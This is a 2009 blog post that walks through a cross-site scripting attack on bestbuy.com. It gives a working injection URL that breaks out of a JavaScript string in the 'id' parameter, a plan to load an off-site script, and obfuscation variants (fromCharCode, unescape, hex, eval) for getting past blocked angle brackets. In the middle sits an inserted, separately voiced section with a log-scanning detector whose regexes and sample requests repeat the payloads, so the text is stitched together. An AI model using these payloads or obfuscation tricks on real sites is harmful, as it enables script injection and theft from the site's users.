This site is soon to be deprecated by http://www.johnleitch.net

Friday, May 8, 2009

Injecting Script Tags Without Access to Less Than and Greater Than Characters - Bestbuy.com

Often an XSS vulnerability allows injection of JavaScript but (seemingly) prohibits injection of XHTML by encoding < and > as &lt; and &gt; respectively. This certainly complicates matters, but with a little effort and obfuscation we can sidestep such preventative measures. To assist in such tasks I created XSS JavaScript Obfuscator (creative name, I know).

Let's take a look at http://www.bestbuy.com/ to see what can be done with such utilities. As always, the first thing we need to do is find the vulnerability. A little testing reveals that the id field is vulnerable to JavaScript injection:
http://www.bestbuy.com/site/olspage.jsp?id=testA.,:;\'"<>()[]{}&type=category
And here is the vulnerable line of JavaScript:

ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "testA.,:;\'"()[]{}- page-detail-404-error", null, "/", triggerParms["domain"])
By injecting ",null,"/",triggerParms["domain"]);var%20x%3Dnew%20Array(" we can turn the vulnerable block of code into this:

ForeCStdSetCookie(triggerParms["oecpp_exitPage"], "",null,"/",triggerParms["domain"]);var x=new Array("- page-detail-404-error", null, "/", triggerParms["domain"]);
At this point we can easily inject JavaScript:
http://www.bestbuy.com/site/olspage.jsp?id=",null,"/",triggerParms["domain"]);alert('Hello,%20World!');var%20x%3Dnew%20Array("&type=category

But with less than and greater than characters blocked how can we include an off-site script? This is where the obfuscator comes in. To use it, we're going to have to split our attack into parts.

Url Prefix: http://www.bestbuy.com/site/olspage.jsp?id=
Url Suffix: &type=category
Attack Vector Prefix: ",null,"/",triggerParms["domain"]);
Attack Vector Suffix: var x=new Array("
Code: <script type="text/javascript" src="http://xss-javascript-obfuscator.googlecode.com/svn/trunk/XSSJavascriptObfuscator/test.js"></script>

Now that we've got our attack broken up, let's populate the fields of XSS JavaScript Obfuscator (embedded at the bottom of this post) and generate some links for http://www.bestbuy.com.

String.fromCharCode
String.fromCharCode + Partial Url Encode
String.fromCharCode + Complete Url Encode
Unescape Partial Encode
Unescape Partial Encode + Partial Url Encode
Unescape Partial Encode + Full Url Encode
Unescape Full Encode
Unescape Full Encode + Partial Url Encode
Unescape Full Encode + Full Url Encode
Unescape Unicode
Unescape Unicode + Partial Url Encode
Unescape Unicode + Full Url Encode
Hex String
Hex String + Partial Url Encode
Hex String + Full Url Encode

And here we are with several links containing obfuscated JavaScript that will inject a script tag. Testing should reveal which links work best; generally the obfuscation methods ending with a partial URL encode are the most compatible.
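The encoding variants listed above are exactly what defeats a signature that matches raw request strings: the same statement can arrive as String.fromCharCode calls, unescape() sequences, hex strings or double URL-encoded text. The following is an added example (my own, not the post's tool) of a log-side detector that decodes each query parameter until it is stable and only then matches indicators of a JavaScript-context breakout. The log lines, the indicator list and the function names analyseRequest and scanLog are constructed assumptions for illustration.

```javascript
// Added example: decode-then-match detection for JavaScript-context injection.
// Indicators are matched against the fully decoded parameter value.
const INDICATORS = [
  // a quote immediately followed by , or ) closes a literal and an argument
  { name: "string-breakout", re: /["']\s*[,)]/ },
  // statement terminator followed by a new statement inside a parameter value
  { name: "statement-terminator", re: /\)\s*;\s*(var|let|const|alert|eval|document)\b/i },
  { name: "fromCharCode", re: /String\.fromCharCode/i },
  { name: "unescape", re: /\bunescape\s*\(/i },
  { name: "eval", re: /\beval\s*\(/i },
  { name: "document.write", re: /document\.write/i },
  { name: "script-tag", re: /<\s*script\b/i },
  // a run of \xHH / \uHHHH escapes is the "Hex String" variant after decoding
  { name: "hex-escape-run", re: /(?:\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){4,}/i },
];

// Repeatedly percent-decode until the value stops changing, so that
// "Full Url Encode" (double-encoded) payloads are seen in plain form.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current.replace(/\+/g, " "));
    } catch (e) {
      return current; // malformed %-sequence: analyse what we have
    }
    if (next === current) return current;
    current = next;
  }
  return current;
}

// Split the query string the way a server would (on & and = before decoding)
// and return one finding per parameter/indicator pair.
function analyseRequest(requestPath) {
  const qIndex = requestPath.indexOf("?");
  if (qIndex < 0) return [];
  const findings = [];
  for (const pair of requestPath.slice(qIndex + 1).split("&")) {
    const eq = pair.indexOf("=");
    const name = eq < 0 ? pair : pair.slice(0, eq);
    const value = fullyDecode(eq < 0 ? "" : pair.slice(eq + 1));
    for (const ind of INDICATORS) {
      if (ind.re.test(value)) findings.push({ param: name, indicator: ind.name });
    }
  }
  return findings;
}

// Constructed sample access-log lines (combined-log style, shortened).
const SAMPLE_LOG = [
  '203.0.113.5 - - [08/May/2009:10:00:01 -0500] "GET /site/olspage.jsp?id=abcat0500000&type=category HTTP/1.1" 200 5120',
  '203.0.113.7 - - [08/May/2009:10:00:02 -0500] "GET /site/olspage.jsp?id=%22,null,%22/%22,triggerParms[%22domain%22]);alert(%27Hello,%20World!%27);var%20x%3Dnew%20Array(%22&type=category HTTP/1.1" 200 5120',
  '203.0.113.9 - - [08/May/2009:10:00:03 -0500] "GET /site/olspage.jsp?id=%2522%252Cnull%2529%253Beval%2528String.fromCharCode%252888%252C83%252C83%2529%2529%253Bvar%2520x%253D%2528%2522&type=category HTTP/1.1" 200 5120',
];

// Extract the request path from each line and report lines with findings.
function scanLog(lines) {
  const hits = [];
  for (const line of lines) {
    const m = /"(?:GET|POST) (\S+) HTTP\//.exec(line);
    if (!m) continue;
    const findings = analyseRequest(m[1]);
    if (findings.length > 0) {
      hits.push({ client: line.split(" ")[0], path: m[1], findings });
    }
  }
  return hits;
}

for (const hit of scanLog(SAMPLE_LOG)) {
  console.log(hit.client, hit.findings.map((f) => f.indicator).join(","));
}
```

The first line is a normal catalogue request and produces nothing; the second is the post's own injection and trips the breakout and statement-terminator indicators; the third is double-encoded and would be missed by a single decode, but after the loop stabilises it also matches fromCharCode and eval. The "string-breakout" indicator is noisy on free-text search fields, so in practice it is a scoring input rather than a block rule; the decode-until-stable step is the part that matters.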

[XSS JavaScript Obfuscator form embedded here. Fields: Url Prefix, Url Suffix, Attack Vector Prefix, Attack Vector Suffix, Code, Encoded Javascript. Options: Partial Url Encode, Complete Url Encode. Decode Method: String.fromCharCode call, unescape partial encode call, unescape full encode call, unescape full unicode encode call, hex string. Decode Return Call: document.write, eval.]
